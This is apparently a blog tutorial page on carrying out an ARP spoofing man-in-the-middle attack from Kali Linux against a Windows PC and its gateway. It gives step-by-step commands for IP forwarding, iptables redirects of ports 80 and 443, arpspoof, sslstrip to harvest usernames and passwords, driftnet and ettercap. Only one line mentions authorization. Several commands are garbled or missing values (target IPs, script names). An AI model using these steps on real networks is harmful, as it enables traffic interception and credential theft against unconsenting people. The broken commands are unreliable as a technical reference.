ARP spoofing attack – Kali Linux

ARP spoofing attack – Kali Linux

ARP (Address resolution protocol ). ARP is an ethernet layer 2 address, network hardware address (MAC).

The communication between nodes in the network established between source and destination through layer 2 address, i.e., MAC address , in the network the nodes share their MAC address through broadcast.
Every node in the network maintains an ARP cache table which consists of L2 and L3 addressing (IP address and associated MAC address).
To view ARP table, you can launch the command shell in a windows / terminal in Linux and run below command to the list ARP table.

Windows :c:\arp -a (list all address in ARP table)
Linux : #apr -a (list all address in ARP table)
route / firewall # show arp

ARP spoofing is a technique to manipulate the source and destination by doing ARP poisoning through ARP spoofing , the packet can be sniffed / captured & monitored.
Note: don’t try this on any public, corporate or unauthorized networks . Performed only when you have authorization to do.

spoofing attack using Kali Linux

In our configuration guide we are going to show you packet sniffing & spoofing on Kali Linux.
Let’s assume that you are having below nodes.

1. Attacke PC :-Kali linux (act as a man in the middel between victim PC and Gateway)

Attacker PC , In our guide we are using Kali Linux as an attacker machine in order to perform an ARP spoofing attack to victim PC and gateway .

2 Victim PC :- Windows ,

The ARP spoofing attack will convince the victim machine to send all the packets to attacker machine.

3. Victim Gateway PC:- firewall / router ,

The ARP spoofing attack on the gateway of victim PC , this will convince gateway to send back all the traffic to attacker PC.

ARP spoofing attack in Kali Linux , follow the below steps .


1. Enable IP forwarder
2. IPtables NAT
3. ARP spoofing Attack
4. Packet sniffing through sslstrip/driftnet/ettercap/urlsnarf

Step 1: enable IP forwarder

IP forwarder must be enabled , it’s required to redirect traffic through attacker PC .

disable =0
enable =1

#echo “1” > /proc/sys/net/ipv4/ip_forward

View the value set for ip forwarding, this will return a value 1 if not repeat above step

#cat /proc/sys/net/ipv4/ip_forward

Output : 1
#sysctl -p

Step 2: IPtables NAT

Request coming on port 80 will be redirected to user define port number . with the iptable nat rule the victim PC will get internet through attacker PC.

#iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8880
#iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8883

The request received for port number 80 will be redirected to user defined port 8880

Step 3: ARP spoofing attack

Start ARP spoof attack on the victim PC i.e, 192.168.123 and Gateway i.e,

Syntax : arpspoof -i interface -t target-ip target-gateway-ip

ARP spoof attacks on victim PC and associated gateway IP as shown below.

#arpspoof -i eth0 -t

ARP spoof attacks at Victim Gateway as shown below.

#arpspoof -i eth0 -t

Step 4:

Packet sniffing through sslstrip/drifnet/ettercap/urlsnarf

sslstrip : packet sniffing tool which captures all the sensitive information like username , password ,email account and database user details.

The default sslstrip python scripts are located in /usr/share/sslstrip/

The main executable script ” , run below command to sniff the traffic of target PC “ ” and specify the port defined in iptable nat rule.

#python /usr/share/sslstrip/ -p -s -l 8880

wait for a while to record sniffing data in logs /usr/share/sslstrip/sslstrip.log or you can use user define file to dump captured data. For more help on using different options with command, use below command.
# sslstrip -h

Press Ctrl+D to stop the service and view the log file.
driftnet: GUI based tool which captures the screen shots of victim PC anything accessed from the browser .
Launch a tool by using below command. But make sure that you have GUI access or logged in GUI mode.

# driftnet

ettercap: Ettercap is the tool used for ARP spoof attack under Window or Linux operating system. It can be used as a command line or GUI.

#ettercap –i eth0 –T -w /root/output.txt –M arp / /

-i : define specific interface
-T : to launch command execution over the terminal
-M : Man in middle mode
-w : writes sniffed data to a file.

Watch ,ARP spoofing attack – 1/3

Watch ,ARP spoofing attack – 2/3

Leave a Reply

Your email address will not be published. Required fields are marked *

6 + 3 =